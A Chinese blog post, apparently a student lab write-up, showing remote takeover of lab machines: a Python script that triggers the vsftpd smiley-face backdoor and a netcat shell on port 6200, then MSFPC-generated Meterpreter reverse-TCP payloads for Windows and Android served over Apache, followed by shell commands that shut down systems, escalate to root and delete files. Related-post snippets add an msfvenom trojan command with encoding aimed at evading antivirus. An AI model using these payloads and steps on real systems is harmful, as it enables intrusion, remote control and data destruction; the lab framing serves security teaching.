使用MSFPC远程控制

已于 2023-06-28 18:21:59 修改
阅读量486 收藏 5
点赞数
文章标签: windows
于 2023-06-24 19:22:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/y3174445239/article/details/131365452
版权

目录

1.为什么6200端口变成了一个“后门”

1.使用Netcat扫描某IP地址的指定端口

2.使用Netcat连接指定IP地址的指定端口

2 远程控制程序基础

1、远程控制程序:被控端 + 主控端

2、远程控制软件分类:

3 如何使用MSFPC生成被控端并进行远程控制

4. 生成windows系统下的被控端并进行远程控制

步骤一:生成Windows操作系统下的被控端

步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(WinXPenSP3)下载被控端并运行。

步骤三:在kali中运行主控端

步骤四:控制目标靶机一(WinXPenSP3)

步骤五:类似上述操作,控制目标靶机二(32位Windows7)

5. 生成android系统下的被控端并进行远程控制

步骤一:生成android操作系统下的被控端

步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(安卓虚拟机)下载被控端并运行。

步骤三:在kali中运行主控端

步骤四:控制目标靶机(安卓虚拟机)

总结

1.为什么6200端口变成了一个“后门”

Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)

1.使用Netcat扫描某IP地址的指定端口

nc -v 192.168.110.131 80

注:用自己目标靶机的IP

2.使用Netcat连接指定IP地址的指定端口

 

nc 192.168.110.131 80

I:激活笑脸漏洞,使其开启6200端口:

编写python脚本(文件名:backdoor.py):

cd /usr/bin
vi backdoor.py
import socket 
from ftplib import FTP 
host_ip="192.168.110.131"
ftp = FTP()
backdoorstr = "hello:)"
backdoorpass='me'
try:
    ftp.connect(host_ip,21,timeout=2)
    ftp.login(backdoorstr,backdoorpass)
except:
    print("yes good")

注:host_ip="192.168.110.131"也是自己靶机的ip

   

执行并验证:

python backdoor.py

成功激活笑脸漏洞 

nmap -p 6200 192.168.110.131

 查看靶机6200端口是否开启,open(是以打开的意思)

 I: 显示指定目录下的内容

nc 192.168.110.131 6200

 已经成功连接

命令“whoami”是显示指定工作目录下的内容

 II: 尝试其它测试命令

”ls“显示当前位置下的目录和文件

2 远程控制程序基础

1、远程控制程序:被控端 + 主控端

2、远程控制软件分类:

    按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)

    按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。

3 如何使用MSFPC生成被控端并进行远程控制

在Kali 2中生成被控端的工具:MSFPC(msfvenom的优化版)

4. 生成windows系统下的被控端并进行远程控制

测试windows系统实验使用的网络环境,填写以下IP地址:

测试用windows系统(WinXPenSP)的IP: 192.168.110.132            

测试用windows 7系统(32位Windows7)的IP:  192.168.110.133             

虚拟机Kali Linux 2的IP: 192.168.110.130            

注:记得换成自己对应的ip

步骤一:生成Windows操作系统下的被控端

msfpc windows 192.168.110.130

步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(WinXPenSP3)下载被控端并运行。 

  1. 把被控端放到kali的网站主目录下

 

sudo cp windows-meterpreter-staged-reverse-tcp-443.exe /var/www/html/
ls /var/www/html/

2、启动apache2

检查apache2服务是否启动

service apache2 start

 也可以用systemctl start apache2

systemctl status apache2

3、到目标靶机(WinXPenSP3)下载被控端并运行

(1)给被控端改一个好记的名字。

sudo mv windows-meterpreter-staged-reverse-tcp-443.exe /var/www/html/win.exe
ls /var/www/html/

(2)在目标靶机下载被控端

在靶机上用浏览器打192.168.110.130/win.exe

(3)运行被控端

步骤三:在kali中运行主控端

配置对应的主控端

msfconsole -q -r '/home/kali/windows-meterpreter-staged-reverse-tcp-443.exe'

步骤四:控制目标靶机一(WinXPenSP3

  1. 查看会话,并选择会话。
sessions 
sessions 1

  1. 列出当前目录下的所有文件等。
ls -l

  1. 打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。

Shell

看版本systeminfo

设置1000毫秒后关机,并弹出提示信息“hello!”。

shutdown -s -t 10000 -c "hello!"

4、退出shell

步骤五:类似上述操作,控制目标靶机二(32Windows7

  1. 在kali中使用background命令回到主控端控制台。

  1. 到目标靶机(32位Windows7)下载被控端并运行

  1. 在kali中是否自动打开?

4、查看并选择会话3,控制32位windows7。

5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。

(1)输入shell

(2)查看操作系统信息

(3)延时关闭系统并显示提示信息

  1. 退出shell,关闭所有会话。

如果要结束会话1,使用什么命令?

background

5. 生成android系统下的被控端并进行远程控制

测试android系统实验使用的网络环境,填写以下IP地址:

测试用android系统的IP: 192.168.110.134                 

虚拟机Kali Linux 2的IP:   192.168.110.130              

步骤一:生成android操作系统下的被控端

步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(安卓虚拟机)下载被控端并运行。

  1. 把被控端放到kali的网站主目录下

将被控端改名为:android

2、启动apache2

检查apache2服务是否启动?

如果没有启动,启动apache2。

3、到目标靶机(安卓虚拟机)下载被控端并运行

(1)在目标靶机(安卓虚拟机)下载被控端

(2)运行被控端

更改设置:允许安装来自未知来源的应用。

更改之后,再次运行被控端,并选择打开。

步骤三:在kali中运行主控端

配置对应的主控端(一定要用root身份运行)

安卓机运行被控端之前,如下图。

安卓机运行被控端之后,如下图。

步骤四:控制目标靶机(安卓虚拟机)

  1. 查看会话,并选择会话

2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。

查看当前用户帐号。

查看操作系统信息。

切换到root用户。

(1)在安卓虚拟机中弹出提示信息,选择“拒绝”。

在kali中可以看到操作结果是什么?

(2)在安卓虚拟机中弹出提示信息,选择“允许”。

在kali中可以看到操作结果是什么?

在kali中输入whoami,显示当前用户。

切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。

I:当前安卓机的selinux状态:许可

II:尝试在Download目录下载一个windows的被控端。

切换到Download目录,查看当前目录的所有文件:

下载windows的被控端win.exe和txt文件haha.txt:

III:删除Download目录中的所有文件

3、退出

总结

MSFPC全称“MSFvenom Payload Creator”是一个基于用户选择生成多种类型有效载荷的包装器。这个想法是尽可能简单(只需要一个输入)来产生他们的有效载荷。

完全自动化msfvenom&Metasploit是最终目标 (以及能够自动化MSFPC本身)。剩下的就是让用户的生活尽可能简单(如IP选择菜单,msfconsole资源文件/命令,批量有效载荷生成,并能够以任意顺序(以各种格式/模式)输入任何参数 )。

21计算机网络技术2班袁维烽
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用msfvenom实现远程控制.
2301_78457119的博客
06-24 615
在Kali 2中生成被控的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。
利用msf控制目标电脑
m0_52923241的博客
04-08 696
利用永恒之蓝漏洞攻击win7准备工作永恒之蓝漏洞msf简介攻击步骤 准备工作 kali Linux虚拟机一台 win7虚拟机一台(注意关闭防火墙) 永恒之蓝漏洞 简介:永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内
MSF制作木马远程控制windows机器
最新发布
weixin_65633498的博客
04-11 512
Pyload:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=《kali的IP》 LPORT=《指定任意未被占用的口号》 -b "\x00" -i 10 -f exe -o /var/www/html/shell.exe(/var/www/html —>指所制作木马文件存储于该路径之下)(选择需要攻击的用户,这里选择第 1 个)//设置payload,选择漏洞利用模块。//本地IP,即攻击IP。
初识Kage——msf可视化远控平台
weixin_30888707的博客
03-22 509
今天看见有老哥在朋友圈分享了一个神器的github链接——Kage,一个把msf变成可视化远控平台的工具,决定仔(瞎)细(bi)研究一番~ 地址:https://github.com/WayzDev/Kage 下载地址:https://github.com/WayzDev/Kage/releases 首先在readme中作者提到了,Kage是让msf RPC与会话进行交互式产生有效载荷,并且...
今天简单黑一下室友电脑:MSF提权开启远程桌面并连接
kjuhfkicf154的博客
01-04 2607
今天简单黑一下室友电脑~
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2547
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
远控免杀学习笔记-msfvenom自带免杀
m0_49025459的博客
04-10 629
生成的payload.exe在/home/kali/.msf4/local/目录下,然后扔沙箱里看一下。
MSF+内网穿透 实现远控
yxngu
05-09 9776
网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远测试全是我的好友帮助测试 并非实际攻击!!! 写一篇远程的渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明白原理,懂得如何防范,再三强调!!! 使用此教程用在不正当地方造成的后果与本人无关!!! 接下来开始本次教程 先给大家展示一下效果吧!基于此程序可以监视对方电脑,实时屏幕抓取,甚至实时屏幕监测,还有创...
使用msf渗透Win7主机并远程执行命令
qq_44821149的博客
01-23 3322
本文仅用于学习和研究,切勿用于非法用途,本文不承担任何法律责任 1.1 通过 msf 模块获取 Win7 主机远程 shell 1.1.1 我们先进入msf msf5 > msfdb run 1.1.2我们再扫描目标是否存在 ms17-010 漏洞 msf5 > search ms17-01 1.1.3 我们使用 use 命令选中这个模块 msf5 > use auxiliary/scanner/smb/smb_ms17_010 然后我们查看模块需要配置的信息 msf5 auxili
利用msf入侵电脑
weixin_44761350的博客
05-25 1119
msf
使用msfvenom远程控制
m0_68638628的博客
06-29 744
msfvenom是msfpayload,msfencode集成的一个免费的、可下载的框架工具。它的优点是一个单一的工具、标准化的命令行选项、效率高,其免杀效果也不错。⑵再被控改名为winpayload.exe复制到网站的目录(/var/www/html/)将被控linuxpayload.elf生成到网站的目录(/var/www/html/)下。将被控winpayload.exe生成到网站的目录(/var/www/html/)下。⑴将被控payload.exe生成到/var/payload.exe。
MSF远程渗透windows主机
Cwillchris的博客
05-04 691
刚接触MSF的你本地已经学会了渗透,但是如何远程渗透,怎么做,今天教你,声明仅限教学 1、环境准备 准备好 kali linux (IP为192.168.98.30) Windows靶机(IP为192.168.98.150,可以是任意没有安装杀软的Windows机器,有兴趣的可以让不在一个局域网的朋友配合一下) 2、申请免费公网隧道 打开Sunny网 ,注册个账号 按要求注册一个账号,然后登录 然后先仔细看教程,先进行实名认证,需要pay认证费用,且通过支付宝实名认证(防..
使用msfvenom生成被控并进行远程控制
2301_78429157的博客
06-29 454
传送payload 将生成的payload文件(payload.exe)传送到目标机器上。在网络安全领域中,远程控制是一项常见的技术,它允许安全专业人员模拟攻击并评估系统的安全性。远程控制 一旦连接建立成功,你将获得一个Meterpreter Shell,可以在目标机器上执行各种操作和命令。执行payload 在目标机器上执行payload文件。一旦执行成功,它将尝试连接本地机器上的Metasploit监听器。生成payload 首先,我们需要使用msfvenom生成恶意的payload。
Metasploit msfd插件实现远程访问msf
ropin_os的专栏
03-18 4115
linux下:        //进入msfd sudo msfd //打开连接 msfd -a -P //查看口是否打开 netstat -tn //远程连接msf nc windows下://打开连接 msf> load msfd ServerName=你的IP地址 ServerPort=你的口 //查看连接 netstat -na //访问使用telnet telnet   window下可能会出现乱码,这里推荐使用一款开源的软件 putty,附上简单的使用
谨防钓鱼(二)——msf搭档shellter轻松控制目标电脑
tempulcc的博客
09-15 335
metaspolit配合shellter渗透windows
msf后渗透之获取登入password、远程控制、调用摄像头
m0_61506558的博客
09-02 2273
在terminal输入load kili creds_all直接获取密码(不一定成功) 使用kiwi_cmd sekurlsa::logonpasswords获取密码
MSF基本使用和控制台命令
分享学习网络的点点滴滴
12-26 897
Msfconsole使用接口○ 最流行的用户接口○ 几乎可以使用全部MSF功能○ 控制台命令支持TAB自动补全○ 支持外部命令的执行(系统命令等)○ 点击鼠标启动 / msfconsole -h -q -r -v / exit○ help /?
远程个人电脑
别人笑我太疯癫,我笑他人看不穿。
09-03 223
此时你就可以做你想做的事情了,注意操作时使用kali的命令即可,且一般触发后,主控所处在被控程序被触发的目录中。第一步:你需要用Kali做一个被控,也就是用用来控制目标电脑的木马程序,正常情况下做出来后是要伪装的。第三步:目标电脑触发被控程序,就是等目标运行被控程序后,你在主控会收到一条日志,并出现控制会话。-o:生成被控名为payload.exe,保存在kali的/root目录下。被控木马生成后,怎么放到目标电脑上是你的事,本篇准备了一个Win10虚拟机。执行命令,开始监听被控程序。
msf拿下windows的远程桌面
mulincong的博客
05-25 640
msf拿下windows的远程桌面
渗透测试/metasploit控制目标电脑/ms17-010
dkpower111的博客
01-31 329
MSF msf是一款开源安全漏洞利用和测试工具,集成了各种平台常见的溢出漏洞和流行的shellcode,并保持持续更新 模块 auxiliary: 辅助模块,辅助渗透 exploits: 漏洞利用模块,包含主流漏洞利用脚本 payloads: 攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 post: 后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令 encoders:编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值